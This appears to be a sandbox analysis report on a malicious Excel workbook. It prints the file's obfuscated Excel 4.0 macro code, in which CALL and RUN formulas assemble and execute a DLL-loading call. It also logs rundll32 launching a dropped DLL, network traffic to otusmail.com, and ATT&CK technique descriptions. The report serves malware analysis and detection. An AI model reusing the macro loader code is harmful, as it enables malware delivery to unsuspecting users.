,,,,,,,,,,CC,,gin,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,Init,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,dl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,BB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

"=COSH(5454645654654650)=ACOS(5.46546546884684E+22)=ASIN(64868468684684600)=COSH(68465454284548)=ACOS(5484512167481510000)=ASIN(15648451864516800)=COSH(4515155354615610000)=CALL(Sheet5!BF57&Sheet2!BP64&Sheet2!BN68&""o""&Sheet2!BN69,Sheet5!BC27&Sheet2!BP48&Sheet2!BP49&Sheet2!BQ66&Sheet2!BM49&Sheet2!BM50&Sheet2!BM51&Sheet2!BQ70&Sheet2!BQ71&Sheet2!BQ72&Sheet2!BQ73&""T""&Sheet2!BM77&Sheet2!BM78&Sheet2!BM79&Sheet2!BM80&Sheet2!BQ79&Sheet5!BB54,Sheet2!BR64&Sheet2!BR65&Sheet2!BR75,0,Sheet2!BU37&Sheet2!BU38&Sheet2!BU39&Sheet2!BU40,Sheet2!BT63,0,0)&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=RUN(Sheet4!AS11)=ASIN(4451548415151)=COSH(5454645654654650)=ACOS(5.46546546884684E+22)=ASIN(64868468684684600)=COSH(68465454284548)=ACOS(5484512167481510000)=ASIN(15648451864516800)=COSH(4515155354615610000)=ACOS(1.15154134535435E+24)&""""&""""&""""&""""&""""&"""""

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 01:06:25.358191013 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.409519911 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.409667969 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.428208113 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.481865883 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.486027956 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.486082077 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.486171007 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.486241102 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.502140045 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.553443909 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.553972960 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.554039955 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.790385962 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.842232943 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.973910093 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.973949909 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.973998070 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974030972 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974067926 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974095106 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974126101 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974150896 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.974163055 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974206924 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.974217892 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.974225044 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.974422932 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974462986 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.974493027 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.974523067 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.975627899 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.975668907 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.975711107 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.975749969 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.976833105 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.976872921 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.976903915 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.976932049 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.978015900 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.978081942 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.991209984 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.999521971 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.999563932 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:25.999705076 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:25.999727964 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.031743050 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.031789064 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.031858921 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.031908989 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.032004118 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.032047987 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.033101082 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.033144951 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.033274889 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.033298969 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.034281015 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.034327030 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.034401894 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.035479069 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.035522938 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.035582066 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.035607100 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.036685944 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.036730051 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.036808014 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.037878990 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.037930012 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.037985086 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.038011074 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.038255930 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.039073944 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.039113045 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.039177895 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.040261984 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.040303946 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.040357113 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.040380001 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.041474104 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.041517019 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.041591883 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.042628050 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.042752028 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.060585022 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.060627937 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.060713053 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.060745955 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.060761929 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.060812950 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.060821056 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.092252016 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.092325926 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.092336893 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.092365026 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.092376947 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.092403889 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.092405081 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.092453003 CEST	49165	443	192.168.2.22	172.67.151.10
May 4, 2021 01:06:26.092993021 CEST	443	49165	172.67.151.10	192.168.2.22
May 4, 2021 01:06:26.093034029 CEST	443	49165	172.67.151.10	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 01:06:25.272228003 CEST	52197	53	192.168.2.22	8.8.8.8
May 4, 2021 01:06:25.336134911 CEST	53	52197	8.8.8.8	192.168.2.22
May 4, 2021 01:07:04.171047926 CEST	53099	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:04.229815006 CEST	53	53099	8.8.8.8	192.168.2.22
May 4, 2021 01:07:04.246711969 CEST	52838	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:04.301603079 CEST	53	52838	8.8.8.8	192.168.2.22
May 4, 2021 01:07:05.319027901 CEST	61200	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:05.381552935 CEST	53	61200	8.8.8.8	192.168.2.22
May 4, 2021 01:07:05.385163069 CEST	49548	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:05.450896025 CEST	53	49548	8.8.8.8	192.168.2.22
May 4, 2021 01:07:05.913003922 CEST	55627	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:05.974405050 CEST	53	55627	8.8.8.8	192.168.2.22
May 4, 2021 01:07:05.983359098 CEST	56009	53	192.168.2.22	8.8.8.8
May 4, 2021 01:07:06.044282913 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 01:06:25.272228003 CEST	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	otusmail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 4, 2021 01:06:25.336134911 CEST	8.8.8.8	192.168.2.22	0x1168	No error (0)	otusmail.com	172.67.151.10	A (IP address)	IN (0x0001)
May 4, 2021 01:06:25.336134911 CEST	8.8.8.8	192.168.2.22	0x1168	No error (0)	otusmail.com	104.21.64.132	A (IP address)	IN (0x0001)
May 4, 2021 01:07:05.381552935 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
May 4, 2021 01:07:05.381552935 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
May 4, 2021 01:07:05.450896025 CEST	8.8.8.8	192.168.2.22	0xfa72	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
May 4, 2021 01:07:05.450896025 CEST	8.8.8.8	192.168.2.22	0xfa72	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 01:06:25.486082077 CEST	172.67.151.10	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Apr 28 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Thu Apr 28 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
May 4, 2021 01:06:25.486082077 CEST	172.67.151.10	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2064 Parent PID: 584

General

Start time:	01:06:32
Start date:	04/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa20000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2564 Parent PID: 2064

General

Start time:	01:06:37
Start date:	04/05/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\bsdnbsej.dbw,PluginInit
Imagebase:	0xffad0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2484 Parent PID: 2564

General

Start time:	01:06:37
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\bsdnbsej.dbw,PluginInit
Imagebase:	0xef0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Documents_111651917_375818984.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Documents_111651917_375818984.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 288088

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers